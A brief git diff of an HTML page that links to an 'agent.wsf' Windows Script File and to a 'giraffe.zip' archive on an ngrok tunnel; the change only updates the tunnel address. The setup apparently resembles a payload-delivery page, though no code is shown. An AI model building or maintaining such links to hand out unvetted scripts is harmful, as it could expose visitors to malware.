--- a/index.html
+++ b/index.html
@@ -1,5 +1,5 @@
 
 <a href="agent/agent.wsf">Agent</a>
 <br/>
-<a href="https://7b4f-2a00-1370-817a-a600-c5d3-8c05-b0f6-2ffb.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
+<a href="https://9f4c-109-252-43-239.ngrok-free.app/agent/giraffe.zip">Giraffe</a>
     
